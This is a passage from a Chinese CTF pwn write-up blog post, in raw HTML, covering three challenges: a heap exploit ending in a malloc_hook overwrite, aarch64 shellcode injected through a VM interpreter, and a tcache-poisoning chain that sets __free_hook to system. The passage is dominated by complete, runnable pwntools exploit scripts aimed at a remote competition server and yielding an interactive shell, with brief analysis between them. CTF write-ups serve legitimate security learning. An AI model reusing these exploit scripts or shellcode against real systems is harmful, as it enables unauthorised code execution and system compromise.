class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x38\x39&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIvAAAAAAAAAAgAAAAAAAAABwAAAAAAAABBQUFBQUFBQVNpemUgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=p64(malloc_hook-<span class="number">0x23</span>)</span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x31&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x38\x39&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIvAAAAAAAAAAgAAAAAAAAABwAAAAAAAABBQUFBQUFBQVNpemUgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=p64(malloc_hook-<span class="number">0x23</span>)</span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x31&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x38\x39&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIvAAAAAAAAAAgAAAAAAAAABwAAAAAAAABBQUFBQUFBQVNpemUgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x13</span>+p64(one)</span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x70\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x31&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x70\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x38\x39&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIvAAAAAAAAAAgAAAAAAAAABwAAAAAAAABBQUFBQUFBQVNpemUgPj4=&quot;</span>)</span><br><span class="line">sd(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;a&quot;</span>*<span class="number">0x13</span>+p64(one)</span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=&quot;</span>)</span><br><span class="line">sd(base64.b64encode(s))</span><br><span class="line">ti()</span><br></pre></td></tr></table></figure>

<h1 id="虎符quiet"><a href="#虎符quiet" class="headerlink" title="虎符quiet"></a>虎符quiet</h1><h2 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h2><p>虚拟机pwn，分析了几个函数之后如下：</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404201528534.png" class="">

<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404201332464.png" class="">

<p>很显然，由于mmap_addr可读可写可执行，这已经足够我们完成攻击了</p>
<h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><p>利用off_12038的get_c功能和off_12018的指针后移功能，逐个字节地向mmap_addr(0x100000000000)中写入shellcode，然后用off_12058的跳转功能跳转执行shellcode即可</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">local=<span class="number">1</span></span><br><span class="line">debug=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	<span class="keyword">if</span> debug:</span><br><span class="line">		sh=process([<span class="string">&#x27;qemu-aarch64&#x27;</span>,<span class="string">&#x27;-g&#x27;</span>,<span class="string">&#x27;1234&#x27;</span>,<span class="string">&#x27;./pwn&#x27;</span>])</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		sh=process([<span class="string">&#x27;qemu-aarch64&#x27;</span>,<span class="string">&#x27;./pwn&#x27;</span>])</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    sh=remote(<span class="string">&quot;8.140.179.11&quot;</span>,<span class="number">51322</span>)</span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">&quot;:&quot;</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line">shellcode=<span class="string">&quot;\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4&quot;</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&quot;\x23\x29&quot;</span>*<span class="built_in">len</span>(shellcode)</span><br><span class="line">payload+=<span class="string">&quot;\x47&quot;</span></span><br><span class="line">sa(<span class="string">&quot;cmd&gt; &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(shellcode)):</span><br><span class="line">	sd(shellcode[i])</span><br><span class="line">ti()</span><br></pre></td></tr></table></figure>

<h1 id="虎符apollo"><a href="#虎符apollo" class="headerlink" title="虎符apollo"></a>虎符apollo</h1><p>这题说实话可惜了，最后时间太慌了，但凡比赛最后冷静分析个十几分钟当时也就出了</p>
<h2 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h2><p>也是虚拟机pwn，还能咋办，慢慢逆呗</p>
<p>首先第一步是要执行loc_eb8的，不然dword_14098为0啥也干不了</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203118549.png" class="">

<p>这里就是输入两个数a，b，在0x3到0x10之间</p>
<p>然后就是</p>
<p>chunk1=calloc(a*b,1)；</p>
<p>chunk2=calloc(a*b,1)</p>
<p>这步过后，dword_14098置1，其他函数的功能就可以正常使用了</p>
<p>然后就是几个常规的add，delete和show功能：</p>
<p>add</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203354935.png" class="">

<p>delete</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203414530.png" class="">

<p>show</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203435064.png" class="">

<p>还有可以对chunk1数据做修改的两个函数：</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203820088.png" class="">

<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203832082.png" class="">

<p>接下来就是几个关键函数了</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203857068.png" class="">

<p>这四个函数的作用相类似，取一个看一下：</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203925710.png" class="">

<p>总结出两个关键点：</p>
<p>1）可以对chunk1和chunk2的数据做修改，数据在一定范围内可控</p>
<p>2）修改的位置可以溢出</p>
<h2 id="exp-2"><a href="#exp-2" class="headerlink" title="exp"></a>exp</h2><p>根据上面的分析，这样就很简单了：</p>
<p>a=4，b=6</p>
<p>sub_1990中如下分支执行两次（要满足相应的分支条件需要提前布置好相应的值）：</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404204235685.png" class="">

<p>这样就实现了dword_140a4=4</p>
<p>qword_14090 + dword_140A4 * dword_140A0 + dword_140A8=chunk2[24]，溢出达成</p>
<p>（这里有关于下标的索引类似于二维数组）</p>
<p>然后就是继续多次执行sub_1990，dword_14080会累加并不断写入chunk2[24]，也就是说可以溢出写下一个chunk的size，直到它变成一个你需要的值</p>
<p>我这里申请0x4f0的chunk，这样得到的chunk的size的数据就是0x501，溢出将其写到0x521为止，再将其free掉，就有了与下一个堆块之间的重叠</p>
<p>free下一个chunk进tcache，再切割上述的0x521大小的chunk，即可改写tcache指针</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">local=<span class="number">1</span></span><br><span class="line">debug=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	<span class="keyword">if</span> debug:</span><br><span class="line">		sh=process([<span class="string">&#x27;qemu-aarch64&#x27;</span>,<span class="string">&#x27;-g&#x27;</span>,<span class="string">&#x27;1234&#x27;</span>,<span class="string">&#x27;./pwn&#x27;</span>])</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		sh=process([<span class="string">&#x27;qemu-aarch64&#x27;</span>,<span class="string">&#x27;./pwn&#x27;</span>])</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    sh=remote(<span class="string">&quot;8.140.179.11&quot;</span>,<span class="number">13422</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">&quot;:&quot;</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&quot;\x4d\x04\x06&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2a\x00\x02\xf0\x04&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2a\x00\x03\x00\x01&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2f\x00\x02&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2a\x00\x02\xf0\x04&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2b\x01\x00\x02&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2b\x03\x00\x02&quot;</span></span><br><span class="line"></span><br><span class="line">payload+=<span class="string">&quot;\x73\x73&quot;</span></span><br><span class="line"></span><br><span class="line">payload+=<span class="string">&quot;\x73&quot;</span>*<span class="number">0x20</span></span><br><span class="line">payload+=<span class="string">&quot;\x70&quot;</span></span><br><span class="line"></span><br><span class="line">payload+=<span class="string">&quot;\x2f\x00\x02&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2f\x00\x03&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2a\x00\x02\xf0\x04&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2a\x00\x03\x10\x00&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2a\x00\x04\x00\x01&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2a\x00\x05\x00\x01&quot;</span></span><br><span class="line">payload+=<span class="string">&quot;\x2f\x00\x02&quot;</span></span><br><span class="line"></span><br><span class="line">sa(<span class="string">&quot;cmd&gt; &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">sd(<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sd(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x111</span>-<span class="number">0x20</span>))</span><br><span class="line"></span><br><span class="line">sd(<span class="string">&#x27;aaaaaaaa&#x27;</span>)</span><br><span class="line">ru(<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">addr=u64(rc(<span class="number">3</span>).ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">leak(<span class="string">&quot;addr&quot;</span>,addr)</span><br><span class="line">libc_base=addr+<span class="number">0x4000000000</span>-<span class="number">0x154ad0</span></span><br><span class="line">leak(<span class="string">&quot;libc_base&quot;</span>,libc_base)</span><br><span class="line">free_hook=libc_base+libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">sd(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sd(p64(free_hook))</span><br><span class="line"></span><br><span class="line">sd(<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sd(p64(system))</span><br><span class="line">ti()</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/28/2021DASCTF-Mar-pwn-wp/" rel="next" title="2021DASCTF_Mar_pwn_wp">
                <i class="fa fa-chevron-left"></i> 2021DASCTF_Mar_pwn_wp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/04/13/mrctf-pwn-wp/" rel="prev" title="mrctf_pwn_wp">
                mrctf_pwn_wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/header.jpg"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友链
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://w4rsp1t3.moe" title="web师傅w4rspit3" target="_blank">web师傅w4rspit3</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zjax.top" title="java带师3nc0de" target="_blank">java带师3nc0de</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://rookiez996.gitee.io/r2" title="web师傅r2" target="_blank">web师傅r2</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/weixin_45805993" title="web师傅Biodog" target="_blank">web师傅Biodog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://custuvo.github.io" title="web师傅Cu3tuv0" target="_blank">web师傅Cu3tuv0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://7ee1n.github.io" title="pwn师傅7ee1n" target="_blank">pwn师傅7ee1n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://brooke-hub.github.io" title="pwn师傅Wendy" target="_blank">pwn师傅Wendy</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BA%A2%E6%98%8E%E8%B0%B7%E2%80%94%E5%8F%8C%E8%BE%B9%E5%8D%8F%E5%AE%9A1-0"><span class="nav-text">红明谷—双边协定1.0</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-text">分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BE%93%E5%87%BA"><span class="nav-text">输出</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BE%93%E5%85%A5"><span class="nav-text">输入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%99%8E%E7%AC%A6quiet"><span class="nav-text">虎符quiet</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90-1"><span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp-1"><span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%99%8E%E7%AC%A6apollo"><span class="nav-text">虎符apollo</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90-2"><span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp-2"><span class="nav-text">exp</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
